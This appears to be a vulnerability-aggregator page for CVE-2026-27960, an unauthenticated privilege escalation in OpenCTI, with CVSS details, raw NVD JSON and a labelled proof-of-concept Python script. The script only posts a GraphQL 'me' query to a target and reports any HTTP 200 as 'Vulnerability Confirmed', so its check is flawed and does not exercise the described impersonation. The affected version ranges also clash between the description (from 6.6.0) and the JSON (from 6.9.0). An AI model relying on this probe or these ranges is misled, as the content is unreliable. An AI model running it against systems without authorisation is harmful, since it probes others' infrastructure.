Security Vulnerability Report
中文
CVE-2026-27960 CVSS 9.8 CRITICAL

CVE-2026-27960

Published: 2026-05-05 19:16:21
Last Modified: 2026-05-12 13:45:08
Source: [email protected]

Description

OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. In versions 6.6.0 through 6.9.12, there is a privilege escalation vulnerability that can be exploited by unauthenticated attackers to query the API as any existing user, including the default admin account. This issue has been fixed in version 6.9.13. As a workaround, the default admin can be disabled using the `APP__ADMIN__EXTERNALLY_MANAGED` configuration.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:* - VULNERABLE
OpenCTI 6.6.0
OpenCTI 6.6.1
OpenCTI 6.7.0
OpenCTI 6.8.0
OpenCTI 6.9.0
OpenCTI 6.9.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # OpenCTI GraphQL Endpoint # Replace with the actual target URL target_url = "http://localhost:4000/graphql" # The vulnerability allows unauthenticated users to query the API # as any existing user (e.g., admin) due to improper access control. # Example query to fetch current user information (which should fail without auth) query = """ query { me { id name email role { name } } } """ headers = { "Content-Type": "application/json" } try: response = requests.post(target_url, json={"query": query}, headers=headers) if response.status_code == 200: print("[+] Potential Vulnerability Confirmed!") print("[+] Response:", response.json()) else: print("[-] Request failed or not vulnerable.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27960", "sourceIdentifier": "[email protected]", "published": "2026-05-05T19:16:21.380", "lastModified": "2026-05-12T13:45:07.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. In versions 6.6.0 through 6.9.12, there is a privilege escalation vulnerability that can be exploited by unauthenticated attackers to query the API as any existing user, including the default admin account. This issue has been fixed in version 6.9.13. As a workaround, the default admin can be disabled using the `APP__ADMIN__EXTERNALLY_MANAGED` configuration."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:citeum:opencti:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.9.0", "versionEndExcluding": "6.9.13", "matchCriteriaId": "33B3585F-A14B-421D-88EC-1F075332CBA7"}]}]}], "references": [{"url": "https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-6vvv-vmfr-xhrx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.